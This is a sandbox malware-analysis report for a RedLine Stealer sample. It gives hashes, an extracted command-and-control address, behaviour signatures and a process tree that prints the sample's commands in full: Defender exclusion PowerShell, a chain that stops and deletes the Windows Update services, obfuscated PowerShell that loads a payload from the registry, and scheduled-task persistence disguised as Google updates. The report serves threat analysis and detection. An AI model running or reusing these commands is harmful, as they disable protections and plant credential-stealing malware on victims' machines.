Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
301s -
max time network
296s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
01/11/2022, 09:57
General
-
Target
72ff620722be23a0319e2590e2833772d0643f96bcedaa576b9b50fbc3c3e8d7.exe
-
Size
2.4MB
-
MD5
2e741b20a9b1a20eb723e30d8f0ce395
-
SHA1
7bf2f2a5c210ab1d4b1b70b8541550193924722b
-
SHA256
72ff620722be23a0319e2590e2833772d0643f96bcedaa576b9b50fbc3c3e8d7
-
SHA512
f946462ef91f5c2f0486d195e51ea3f7694a68797ee0f1910e2e518de1221023ef003772d9d1f3adf0c7d321435085dde6a3b262c65c953060282167a73dc5b9
-
SSDEEP
24576:nZAsE+YcYdlNbgwM1/lc+7+F+NalOxkey5mILPKTLfSzvHmh/NeCql3RuQ55313S:esgT+85mILPKTkDl3o
Malware Config
Extracted
redline
62.204.41.141:24758
-
auth_value
3635ab4d86c01914c9036a302ef7c402
Signatures
-
Modifies security service 2 TTPs 2 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 9 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 10 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of SetThreadContext 6 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 5 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 1 IoCs
-
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Sets service image path in registry
- Suspicious behavior: LoadsDriver
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {915AE9F6-ACB9-4E62-B019-34CBE184F38E} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Loads dropped DLL
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f6⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f6⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f6⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f6⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f6⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"6⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe xtrjicqmdliu5⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"6⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor7⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=5⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {394A1DCD-81A7-4A0F-B9FF-FBBE54C3251C} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]3⤵
-
C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exeC:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵
- Checks processor information in registry
-
-
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{74bbd923-9903-41da-a1c7-b1dda15a6af0}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1a7a46ac-1f8d-4d82-88a3-4c869dec841e}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\72ff620722be23a0319e2590e2833772d0643f96bcedaa576b9b50fbc3c3e8d7.exe"C:\Users\Admin\AppData\Local\Temp\72ff620722be23a0319e2590e2833772d0643f96bcedaa576b9b50fbc3c3e8d7.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Microsoft\brave.exe"C:\Users\Admin\AppData\Local\Microsoft\brave.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f5⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f5⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f5⤵
- Modifies security service
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f5⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵
-
-
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"5⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Drops file in Windows directory
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\chrome.exe"C:\Users\Admin\AppData\Local\Microsoft\chrome.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 147148 -s 2004⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\ofg.exe"C:\Users\Admin\AppData\Local\Microsoft\ofg.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd.exe" /C schtasks /create /tn \2h4dfns5mt /tr "C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /tn \2h4dfns5mt /tr "C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f5⤵
- Creates scheduled task(s)
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
Filesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
Filesize
2.8MB
MD59253ed091d81e076a3037e12af3dc871
SHA1ec02829a25b3bf57ad061bbe54180d0c99c76981
SHA25678e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
SHA51229ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
-
Filesize
2.8MB
MD59253ed091d81e076a3037e12af3dc871
SHA1ec02829a25b3bf57ad061bbe54180d0c99c76981
SHA25678e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
SHA51229ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
-
Filesize
6.8MB
MD573b9004ff373f3b7b2f595541deb5a02
SHA1bbc01bab5ae8ed8db2359c3b8a81eed75db5c061
SHA256b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7
SHA512908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4
-
Filesize
9KB
MD5a169fb1a323c970f7a169b30657112cc
SHA15347dc5c0fe604f8527e336dd09a522fef0af9db
SHA25697ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04
SHA5128bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463
-
Filesize
9KB
MD5a169fb1a323c970f7a169b30657112cc
SHA15347dc5c0fe604f8527e336dd09a522fef0af9db
SHA25697ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04
SHA5128bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463
-
Filesize
9KB
MD5a169fb1a323c970f7a169b30657112cc
SHA15347dc5c0fe604f8527e336dd09a522fef0af9db
SHA25697ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04
SHA5128bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463
-
Filesize
9KB
MD5a169fb1a323c970f7a169b30657112cc
SHA15347dc5c0fe604f8527e336dd09a522fef0af9db
SHA25697ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04
SHA5128bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463
-
Filesize
7KB
MD5efc6a5a24a78204996857f44cd1c07ab
SHA130c86a082e1dfc99f1fc4acac3bfaeab1b1f1b14
SHA256756667573300b9f56e6561eda69527fe17859df8055a24692c237bb2f1d3f453
SHA51264ebffbd93f3abe26bc4185020b868fb377af30ec060357003d2fd387ee2c9d7031fe7e1715b95a5f87bd9497772c5bc2092bdf47cd7b8f323cd94b647f477e6
-
Filesize
7KB
MD5efc6a5a24a78204996857f44cd1c07ab
SHA130c86a082e1dfc99f1fc4acac3bfaeab1b1f1b14
SHA256756667573300b9f56e6561eda69527fe17859df8055a24692c237bb2f1d3f453
SHA51264ebffbd93f3abe26bc4185020b868fb377af30ec060357003d2fd387ee2c9d7031fe7e1715b95a5f87bd9497772c5bc2092bdf47cd7b8f323cd94b647f477e6
-
Filesize
1KB
MD59ae65d4ee4b5f3e0c760f1df9fa3d739
SHA15d1101edc079387e584e4073a0e6e4d509e9a627
SHA256ad25b1ae5ffc543859458f99a0bb0df41669366b165cf84ec71da77c387850b5
SHA512983ee5d7739b25deec1e4a38df20702e102181d7eb5269c49f9f043f0f36198483c6fc86ed7535028ebadf27d44985a0ff681cb3fccab793264fddae073ffeb2
-
Filesize
1KB
MD565899e54e0c1b08790d3d6d0fbca0f76
SHA1acd5683c20f24fe61c2e2152af5119742c6a3337
SHA256aec13e98a87965016c3c7cbb37ddc5cb4c989d909028f78f62a821fd06fb5d86
SHA51231c3504411928f8fdb27758e28d7340837c57e51cf52611a7c48578735b149a0e726ecf861129307823762468ff7fafe8b0c7011e2d14aa6fe1095cb908e9329
-
Filesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
Filesize
2.8MB
MD59253ed091d81e076a3037e12af3dc871
SHA1ec02829a25b3bf57ad061bbe54180d0c99c76981
SHA25678e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
SHA51229ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
-
Filesize
6.8MB
MD573b9004ff373f3b7b2f595541deb5a02
SHA1bbc01bab5ae8ed8db2359c3b8a81eed75db5c061
SHA256b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7
SHA512908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4
-
Filesize
6.8MB
MD573b9004ff373f3b7b2f595541deb5a02
SHA1bbc01bab5ae8ed8db2359c3b8a81eed75db5c061
SHA256b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7
SHA512908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4
-
Filesize
6.8MB
MD573b9004ff373f3b7b2f595541deb5a02
SHA1bbc01bab5ae8ed8db2359c3b8a81eed75db5c061
SHA256b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7
SHA512908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4
-
Filesize
6.8MB
MD573b9004ff373f3b7b2f595541deb5a02
SHA1bbc01bab5ae8ed8db2359c3b8a81eed75db5c061
SHA256b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7
SHA512908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4
-
Filesize
6.8MB
MD573b9004ff373f3b7b2f595541deb5a02
SHA1bbc01bab5ae8ed8db2359c3b8a81eed75db5c061
SHA256b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7
